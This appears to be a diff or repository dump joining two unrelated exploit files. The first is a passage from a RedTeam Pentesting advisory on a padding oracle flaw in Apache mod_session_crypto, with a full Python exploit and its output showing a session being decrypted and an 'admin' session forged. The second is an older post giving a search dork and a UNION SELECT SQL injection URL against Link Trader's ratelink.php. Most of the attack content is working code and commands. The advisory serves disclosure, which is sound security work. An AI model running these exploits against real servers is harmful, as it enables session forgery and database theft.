encrypted data. Before returning to the caller, the result is encoded as
base64.
This procedure does not guarantee integrity of the ciphertext, so the
Apache module is unable to detect whether a session sent back to the
server has been tampered with. Depending on the application this often
means that attackers are able to exploit a Padding Oracle vulnerability.
This allows decrypting the session and encrypting arbitrary data chosen
by the attacker.
Proof of Concept
================
The vulnerability can be reproduced as follows. First, the modules
mod_session, mod_session_crypto and mod_session_cookie are enabled and
configured:
------------------------------------------------------------------------
Session On
SessionEnv On
SessionCookieName session path=/
SessionHeader X-Replace-Session
SessionCryptoPassphrase RedTeam
------------------------------------------------------------------------
In addition, CGI scripts are enabled for a folder and the following CGI
script is saved as "status.rb" and is made available to clients:
------------------------------------------------------------------------
#!/usr/bin/env ruby
require 'cgi'
cgi = CGI.new
data = CGI.parse(ENV['HTTP_SESSION'])
if data.has_key? 'username'
puts
puts "your username is %s" % data['username']
exit
end
puts "X-Replace-Session: username=guest&timestamp=" + Time.now.strftime("%s")
puts
puts "not logged in"
------------------------------------------------------------------------
Once the CGI script is correctly set up, the command-line HTTP client curl
can be used to access it:
------------------------------------------------------------------------
$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb
HTTP/1.1 200 OK
Date: Tue, 19 Jan 2016 13:23:19 GMT
Server: Apache/2.4.10 (Ubuntu)
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Cache-Control: no-cache
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Transfer-Encoding: chunked
Content-Type: application/x-ruby
not logged in
------------------------------------------------------------------------
The example shows that a new encrypted cookie with the name "session" is
returned, and the response body contains the text "not logged in".
Calling the script again with the cookie just returned reveals that the
username in the session is set to "guest":
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \
http://127.0.0.1:8080/cgi-bin/status.rb
your username is guest
------------------------------------------------------------------------
Sending a modified cookie ending in "u=" instead of "U=" will invalidate
the padding at the end of the ciphertext, so the session cannot be
decrypted correctly and is therefore not passed to the CGI script, which
returns the text "not logged in" again:
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \
http://127.0.0.1:8080/cgi-bin/status.rb
not logged in
------------------------------------------------------------------------
This verifies the existence of the Padding Oracle vulnerability. The
Python library[1] python-paddingoracle was then used to implement
decrypting the session by exploiting the Padding Oracle vulnerability.
exploit.py
------------------------------------------------------------------------
'''
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
import requests
class PadBuster(PaddingOracle):
def __init__(self, valid_cookie, **kwargs):
super(PadBuster, self).__init__(**kwargs)
self.wait = kwargs.get('wait', 2.0)
self.valid_cookie = valid_cookie
def oracle(self, data, **kwargs):
v = b64encode(self.valid_cookie+data)
response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',
cookies=dict(session=v), stream=False, timeout=5, verify=False)
if 'username' in response.content:
logging.debug('No padding exception raised on %r', v)
return
raise BadPaddingException
if __name__ == '__main__':
import logging
import sys
if not sys.argv[2:]:
print 'Usage: [encrypt|decrypt] <session value> <plaintext>'
sys.exit(1)
logging.basicConfig(level=logging.WARN)
mode = sys.argv[1]
session = b64decode(sys.argv[2])
padbuster = PadBuster(session)
if mode == "decrypt":
cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])
print('Decrypted session:\n%r' % cookie)
elif mode == "encrypt":
key = session[0:16]
plaintext = sys.argv[3]
s = padbuster.encrypt(plaintext, block_size=16)
data = b64encode(key+s[0:len(s)-16])
print('Encrypted session:\n%s' % data)
else:
print "invalid mode"
sys.exit(1)
'''
------------------------------------------------------------------------
This Python script can then be used to decrypt the session:
------------------------------------------------------------------------
$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=
Decrypted session:
b'username=guest&timestamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'
real 6m43.088s
user 0m15.464s
sys 0m0.976s
------------------------------------------------------------------------
In this sample application, the username and a timestamp are included in
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":
------------------------------------------------------------------------
$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
RU= username=admin
Encrypted session:
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY
real3m38.002s
users0m8.536s
sys0m0.512s
------------------------------------------------------------------------
Sending this newly encrypted session to the server shows that the
username is now "admin":
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb
your username is admin
------------------------------------------------------------------------
Workaround
==========
Use a different means to store the session, e.g. in a database by using
mod_session_dbd.
Fix
===
Update to Apache HTTP version 2.4.25 (see [2]).
Security Risk
=============
Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the Padding Oracle vulnerability
subverts this mechanism and allows to construct sessions with arbitrary
attacker-specified content. Depending on the application this may
completely subvert the application's security. Therefore, this
vulnerability poses a high risk.
Timeline
========
2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new released and inquired whether the
patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released
References
==========
[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
'''

View file

@ -1,28 +0,0 @@
|___________________________________________________|
|
| Link Trader (lnkid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : www.iq-ty.com<http://www.iq-ty.com>
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
|
| DorK : inurl:ratelink.php?lnkid=
|___________________________________________________|
Exploit:
www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*